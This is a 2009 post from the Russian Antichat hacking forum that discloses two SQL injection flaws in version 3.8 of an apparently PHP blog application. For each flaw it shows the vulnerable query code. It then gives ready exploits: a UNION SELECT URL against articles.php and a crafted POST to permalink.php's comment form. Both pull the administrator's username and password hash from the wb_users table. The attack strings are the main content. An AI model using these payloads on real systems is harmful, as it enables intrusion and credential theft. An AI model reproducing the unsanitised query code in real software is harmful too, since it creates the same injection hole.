Показать сообщение отдельно

  #2  
Старый 29.12.2009, 20:06
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

Version: 3.8

SQL Injection

Vuln file: articles.php
PHP код:
/*...*/
if(isset($_GET['page'])) {
## Check if the Anypage exists
    
$check strpos($_GET['page'], '+');
    
$check .= strpos($_GET['page'], '%20');
    if(!
$check) {
        
$showpage mysql_query("SELECT Title, Subheading, PageDesc, PageBody, AnyCat1, AnyCat2, AnyCat3, AnyCat4, Author, Timestamp FROM ".ANYPAGE_TBL."
            WHERE UrlName='"
.$_GET['page']."'");
    }
/*...*/ 
Exploit:
Код:
http://[host]/[path]/articles.php?page=1'+union+select+null,concat_ws(0x3a,UserName,Password),null,null,null,null,null,null,null,null+from+wb_users+where+UserID=1+--+
Vuln file: permalink.php
PHP код:
/*...*/
        
$comment_sent mysql_query("INSERT INTO ".COMMENTS_TBL." (PostID, Name, Email, Url, Body, Timestamp) VALUES
        ('"
.$_POST['PostID']."', '".strip_tags($_POST['name'])."', '".strip_tags($_POST['email'])."', '$url', '".nl2br($comment)."', 
            '"
.time()."')");
/*...*/ 
Exploit:
Код:
POST http://[host]/[path]/permalink.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

PostID=1
&name=Antichat.ru
&email=admin@lol.lol
&url=xek',(select concat_ws(0x3a,UserName,Password) from wb_users where UserID=1),'A')/*
&comment=Hello World
&submit=Say%20this
смотрим логин:хэш админа в комментах

Для успешной эксплуатации уязвимостей необходимо:
magic_quotes = OFF
 
Ответить с цитированием